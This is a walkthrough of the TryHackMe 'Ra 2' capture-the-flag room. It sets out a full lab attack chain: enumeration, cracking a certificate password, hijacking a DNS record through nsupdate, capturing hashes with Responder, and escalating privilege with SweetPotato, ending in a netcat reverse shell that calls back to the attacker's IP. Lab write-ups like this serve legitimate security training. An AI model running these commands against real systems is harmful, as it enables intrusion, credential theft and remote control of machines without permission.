Ra 2 TryHackme Walkthrough
By Shamsher khan This is a Writeup of Tryhackme room “Ra 2”
Room link: https://tryhackme.com/room/ra2
Note: This room is for Premium Members Only. who purchased THM premium membership.
Difficulty: Hard
Room: Ra2
Created by: 4ndr34zz and theart42
Have you complete Ra 1 room
Enumeration
If you want to use nmap i suggest
nmap -p- -T4 -sC -sV -Pn -vvv 10.10.202.59This process can be take long time scan maybe 30 minutes or 45
Lets visit 10.10.202.59 in browser and it reveal http://fire.windcorp.thm/
Hostname
fire.windcorp.thm
add to /etc/hosts file
echo 10.10.202.59 fire.windcorp.thm >>/etc/hosts
Here i doubt this domain has more DNS so i check Certificate
i found Two more DNS
selfservice.windcorp.thm
selfservice.dev.windcorp.thm
Add to /etc/hosts
Dig Tool reveals our first flag
gobuster dir -u https://fire.windcorp.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k
Visit https://fire.windcorp.thm/powershell
But we don’t have Credential
gobuster dir -u https://selfservice.dev.windcorp.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k
we found backup folder
download these files and check the content of file
cert.pfx is password protected .Try t crack the password
Crackpkcs12 Tool
crackpkcs12 is a tool to audit PKCS#12 files passwords (extension .p12 or .pfx). It’s written in C and uses openssl library. It works on GNU/Linux and other UNIX systems. His author is aestu and his license is GPLv3+ slightly modified to use openssl library
Windows servers use .pfx files that contain a public key file and the associated private key file. Let’s use crackpkcs12.
You can download it here.
tar -xf crackpkcs12*
cd crackpkcs12*
./configure
make
sudo make installA simple dictionary attack:
crackpkcs12 -d rockyou.txt certificate.pfx
Generate Private key
openssl pkcs12 -in cert.pfx -nocerts -out private.pem -nodesGenerate Public key
openssl pkcs12 -in cert.pfx -out public.pem -clcerts -nokeys
nsupdate
Since we know we can update DNS records without our machine being joined to the domain we’ll use nsupdate. Let’s send a request to delete the existing A record for selfservice.windcorp.thm and then send an update add request for a new A record to have selfservice resolve to our THM IP.
🚀 nsupdate
> server 10.10.168.132
> update delete selfservice.windcorp.thm
> send
> update add selfservice.windcorp.thm 1234 A 10.2.12.26
> send
> quit
Let’s Try dig Tool
Let’s query the DNS server to see if selfservice.windcorp.thm will now resolve to our THM IP when a client requests a lookup.
dig selfservice.windcorp.thm @10.10.168.132
Responder
Before you start responder you’ll want to copy the two certs generated earlier to /usr/share/responder/certs or wherever /certs lives on your machine.
We’ll want to edit responder’s config for the HTTPS server.
Then edit /etc/responder/Responder.conf
Fire up responder to listen on tun0
Now visit this URL
https://selfservice.dev.windcorp.thm/backup/We capture a request.
save this hash into file and Crack this hash
So we have credential
As the server is not running SSH, but there is an alternative, WinRM on port 5985. WinRM is used for PowerShell remoting, where an authenticated user can access the server and submit commands. Using the evil-winrm tool, we can access the server semi-interactively.
Now login here https://fire.windcorp.thm/powershell
This makes us think of SweetPotato.
Now start
rlwrap nc -lvp 4444
.\SweetPotato.exe -p nc.exe -a "-e cmd 10.2.12.26 4444"
You can find me on:
LinkedIn:- https://www.linkedin.com/in/shamsher-khan-651a35162/
Twitter:- https://twitter.com/shamsherkhannn
Tryhackme:- https://tryhackme.com/p/Shamsher
For more walkthroughs stay tuned…
Before you go…
Visit my other walkthrough’s:-
and thank you for taking the time to read my walkthrough.
If you found it helpful, please hit the 👏 button 👏 (up to 40x) and share
it to help others with similar interests! + Feedback is always welcome!
